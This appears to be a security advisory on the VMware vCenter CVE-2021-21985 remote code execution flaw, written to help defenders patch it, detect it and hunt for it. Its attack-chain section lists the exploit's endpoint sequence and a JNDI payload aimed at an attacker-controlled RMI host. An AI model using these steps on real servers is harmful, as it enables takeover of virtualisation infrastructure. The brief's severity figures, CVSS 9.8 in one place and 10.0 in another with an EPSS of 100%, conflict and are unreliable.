Exploitation of CVE-2021-21985 in VMware vCenter Server
Public proof-of-concept exploits for CVE-2021-21985 have been released, enabling unauthenticated remote code execution in VMware vCenter Server via the Virtual SAN Health Check plug-in.
CVE search metadata
CVE search record: CVE-2021-21985. Severity: critical. CVSS: 9.8. EPSS: 100.00%. KEV: no. Product: vCenter Server (6.5, 6.7, 7.0). Brief: Exploitation of CVE-2021-21985 in VMware vCenter Server. Brief link: https://feed.craftedsignal.io/briefs/2026-10-cve-2021-21985-vcenter-rce/
CVE-2021-21985 is a critical remote code execution (RCE) vulnerability affecting the vSphere Client (HTML5) in VMware vCenter Server versions 6.5, 6.7, and 7.0. The vulnerability is caused by an input validation flaw within the Virtual SAN Health Check plug-in, which is enabled by default. As of October 2026, multiple proof-of-concept (PoC) exploits have been published on security platforms, significantly lowering the barrier for exploitation. An unauthenticated attacker can send specially crafted HTTP POST requests to the vCenter server to trigger arbitrary code execution via JNDI lookup or other VMODL helper operations. This vulnerability is highly dangerous due to its remote, unauthenticated nature and CVSS score of 10.0, allowing complete system compromise.
Attack Chain
- The attacker performs initial reconnaissance to identify internet-facing vCenter instances.
- The attacker sends an HTTP POST request to '/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetObject' to set the target object to null.
- The attacker sends a request to '/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setStaticMethod' with 'javax.naming.InitialContext.doLookup' as the payload.
- The attacker configures the target method by sending a POST request to '/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetMethod' with 'doLookup'.
- The attacker specifies the JNDI payload, such as 'rmi://attacker-controlled-server:9090/resource', via a POST request to '/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setArguments'.
- The attacker initializes the helper class by sending a POST request to the 'prepare' endpoint.
- The attacker triggers the final payload execution by sending a POST request to the 'invoke' endpoint.
- The vCenter server initiates an outbound connection to the attacker's infrastructure, resulting in code execution or data exfiltration.
Impact
Successful exploitation allows an unauthenticated remote attacker to gain full control over the vCenter Server. This impact includes complete loss of confidentiality, integrity, and availability for the vCenter instance and all virtual machines managed by it. Given the prevalence of vCenter in enterprise environments, successful exploitation could facilitate widespread ransomware distribution or persistent lateral movement within an organization's internal network.
Recommendation
Prioritized, concrete actions for detection engineering teams:
- Patch all instances of VMware vCenter Server to the latest version as recommended in VMSA-2021-0010.
- Deploy the Sigma rule below to monitor for unauthorized usage of the 'vsanProviderUtils_setVmodlHelper' service.
- Monitor firewall and proxy logs for unusual outbound connections originating from vCenter Servers, specifically RMI or LDAP traffic (TCP/9090 or others).
- Enable detailed logging for the vSphere Client ('/var/log/vmware/vsphere-ui/logs/vsphere_client_virgo.log') and audit for the specific endpoints described in the attack chain.
Immediate actions
Patch all vulnerable vCenter Server instances to the version specified in VMSA-2021-0010.
Threat Hunt
Search web logs for POST requests to /ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/
Data: webserver access logs
Mitigations
Patch VMware vCenter Server
CVE-2021-21985
Detection coverage 1
Detect CVE-2021-21985 Exploitation Attempts
highDetects HTTP POST requests targeting the VsanCapabilityProvider or VmodlHelper services indicative of CVE-2021-21985 exploitation attempts
Detection queries are available on the platform. Get full rules →